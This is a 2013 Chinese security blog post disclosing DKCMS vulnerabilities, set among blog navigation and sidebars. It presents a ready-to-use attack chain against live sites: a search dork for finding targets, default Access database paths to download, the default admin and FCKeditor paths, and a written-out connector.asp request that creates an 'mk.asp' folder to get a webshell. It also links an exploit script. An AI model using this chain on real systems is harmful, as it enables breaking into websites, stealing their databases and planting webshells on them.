阿峰博客 阿峰'S blog

  • 首页
  • 移动安全
    • Android安全
    • iOS安全
    • APP安全
  • 新闻资讯
    • IT新闻
    • 安全资讯
  • 信息安全
    • WEB安全
    • 系统安全
    • 终端安全
    • 安全工具
  • 建站优化
    • 网站优化
    • 网络营销
  • 资源共享
  • 关于博客
    • 申请友链
    • 在线投稿
不忘初心,砥砺前行。
  1. 首页
  2. 信息安全
  3. 正文

最新DKCMS漏洞,动科企业网站管理系统0ADY

2013 年 1 月 13 日 2240点热度 0人点赞 0条评论

主要是差不多3个版本为主,v2.0 v3.1 v4.2

谷歌关键字:powered by dkcms

官网竟然找不到源码下载,就百度了,下载了这3款源码,因为是asp的源码,大多都是看看默认数据库,一下是三款默认数据库

V2.0 data/dkcm_ssdfhwejkfs.mdb

V3.1 _data/___dkcms_30_free.mdb

V4.2 _data/I^(()UU()H.mdb

默认后台:admin

编辑器:admin/fckeditor

这些都是,由此可见,官方安全意识挺差的,至于后台拿shell,fck编辑器突破可拿shell

建立asp文件夹
Fck的路径:

1 Admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/mk.asp&NewFolderName=mk.asp

顺便送上一个fck利用脚本
点击下载

标签: 最新DKCMS漏洞
最后更新:2013 年 1 月 13 日

阿峰

保持饥渴的专注,追求最佳的品质

点赞
< 上一篇
下一篇 >

文章评论

取消回复

标签聚合
工具 端口扫描 网络安全 渗透测试 Wordpress xss漏洞 perl 关键字
最新 热点 随机
最新 热点 随机
安卓批量搜索分析Java 类/对象结构脚本工具 MAC下在Genymotion模拟器中使用IDA动态调试android安卓应用 Joy:一款用于捕获和分析网络内部流量数据的工具 One-Lin3r:懒人的福音,渗透测试单行化工具 EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具 国产网站恶意代码监测(网马监控)工具优化版
MAC下在Genymotion模拟器中使用IDA动态调试android安卓应用安卓批量搜索分析Java 类/对象结构脚本工具
用ubnt无线网桥接收wlan信号 Drupal Core 6.x/7.x 任意PHP代码执行漏洞 ​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分) 利用XSS漏洞进行钓鱼的方法 XSS的漏洞查找与检测 过D盾Web查杀/安全狗/护卫神的PHP免杀一句话WebShell
最近评论
发布于 2 年前(07月07日) 小哥,可以帮忙把我的友链修改为 https://feifanblog.com 么?谢谢啦~
发布于 3 年前(07月23日) top.document.body.innerHTML=""; 这个是1.js 还是xss ...
发布于 3 年前(11月22日) 看错了,还以为是你买的register.com呢。。。
发布于 3 年前(10月22日) 大佬 求sql 放正系统注入工具
发布于 4 年前(05月27日) 感觉还是非常复杂的呢。。。。

COPYRIGHT © 2021 阿峰博客 阿峰'S blog. ALL RIGHTS RESERVED.

本站发布的内容仅限于学习和研究,请勿用于非法渗透和攻击,否则一切后果请自负;遵守法律法规,做一个合格的安全从业者。